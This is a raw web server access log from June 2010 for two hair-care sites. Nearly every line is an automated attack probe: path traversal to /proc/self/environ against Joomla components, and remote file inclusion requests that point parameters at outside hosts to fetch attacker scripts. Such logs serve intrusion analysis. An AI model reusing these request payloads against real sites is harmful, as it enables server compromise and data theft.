218.146.255.196 - - [14/Jun/2010:01:14:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:14:25 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:14:25 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:14:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.121.208.42 - - [14/Jun/2010:01:14:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:14:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:14:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
195.190.166.35 - - [14/Jun/2010:01:15:06 -0700] "GET /components/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [14/Jun/2010:01:15:06 -0700] "GET /logs//components/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:15:09 -0700] "GET /logs/access_100510.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:15:10 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:15:10 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:15:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:15:51 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:15:51 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:15:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:16:14 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:16:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:16:15 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:16:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:17:18 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.62.216.2 - - [14/Jun/2010:01:17:44 -0700] "GET /logs/access.log//include/write.php?dir=http://solid.go.ro/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
64.62.216.2 - - [14/Jun/2010:01:17:44 -0700] "GET /include/write.php?dir=http://solid.go.ro/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
64.62.216.2 - - [14/Jun/2010:01:17:44 -0700] "GET /logs//include/write.php?dir=http://solid.go.ro/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:17:54 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:01:17:55 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:01:17:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:01:17:56 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:17:57 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:18:02 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:18:35 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:18:35 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:18:35 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:18:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:18:54 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:18:54 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:19:00 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:19:09 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:19:09 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:19:09 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:19:59 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.66.250 - - [14/Jun/2010:01:19:59 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.66.250 - - [14/Jun/2010:01:19:59 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:20:36 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:01:21:12 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.66.250 - - [14/Jun/2010:01:21:12 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.66.250 - - [14/Jun/2010:01:21:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [14/Jun/2010:01:21:38 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [14/Jun/2010:01:21:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [14/Jun/2010:01:21:39 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:21:59 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:21:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:22:00 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.58.183.16 - - [14/Jun/2010:01:22:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.183.16 - - [14/Jun/2010:01:22:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:22:43 -0700] "GET /logs/access_100503.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:22:43 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:22:43 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.803" "growlonghairfast.com"
62.210.190.230 - - [14/Jun/2010:01:22:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:23:33 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
122.201.90.71 - - [14/Jun/2010:01:25:14 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:25:18 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.34.165.224 - - [14/Jun/2010:01:25:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:26:52 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:27:54 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:28:03 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:28:05 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:28:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:28:06 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
122.201.90.71 - - [14/Jun/2010:01:28:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:28:56 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:30:35 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:30:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:30:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:30:58 -0700] "GET /logs/access_100503.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:30:58 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:30:59 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:31:00 -0700] "GET /logs/access_100503.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:31:00 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:31:00 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:01:31:04 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zcar.ir/.xml/.id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:31:18 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:31:50 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:31:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:31:51 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:32:03 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:32:57 -0700] "GET /logs/access_100412.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:32:57 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:32:57 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:33:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:33:16 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:33:25 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:33:35 -0700] "GET /logs/access_100412.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:34:14 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:34:21 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:34:21 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:34:35 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:35:28 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:36:02 -0700] "GET /logs/access_091123.log%20%20/error.php?dir=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:36:02 -0700] "GET /error.php?dir=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:36:07 -0700] "GET /logs/error.php?dir=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:36:18 -0700] "GET /logs/access_100503.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:36:19 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:36:19 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:36:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:01:38:04 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.247.77.7 - - [14/Jun/2010:01:38:04 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.247.77.7 - - [14/Jun/2010:01:38:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.203.180.144 - - [14/Jun/2010:01:38:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:38:43 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:38:44 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:38:44 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.223 - - [14/Jun/2010:01:38:54 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:38:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:38:54 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
221.143.46.98 - - [14/Jun/2010:01:39:25 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "http://av.rds.yahoo.com/_ylt=A0oGktuz6RVM.N8AHxdTDqMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=126vjf6l1/EXP=1276590899/**http%3A//growlonghairfast.com/logs/access_100308.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:39:32 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
221.143.46.98 - - [14/Jun/2010:01:39:58 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "http://av.rds.yahoo.com/_ylt=A0oGktu.6RVMgN4AbCxTDqMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=126p2pggp/EXP=1276590910/**http%3A//growlonghairfast.com/logs/access_100308.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
221.143.46.98 - - [14/Jun/2010:01:40:20 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "http://av.rds.yahoo.com/_ylt=A0oGkt_P6RVMLn8BMjlTDqMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=126u4v7cc/EXP=1276590927/**http%3A//growlonghairfast.com/logs/access_100308.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
221.143.46.98 - - [14/Jun/2010:01:40:42 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "http://av.rds.yahoo.com/_ylt=A0oGktvj6RVM.N8ABBtTDqMX;_ylu=X3oDMTBvdmM3bGlxBHBndANhdl93ZWJfcmVzdWx0BHNlYwNzcg--/SIG=126f80ua5/EXP=1276590947/**http%3A//growlonghairfast.com/logs/access_100308.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:40:46 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:41:29 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
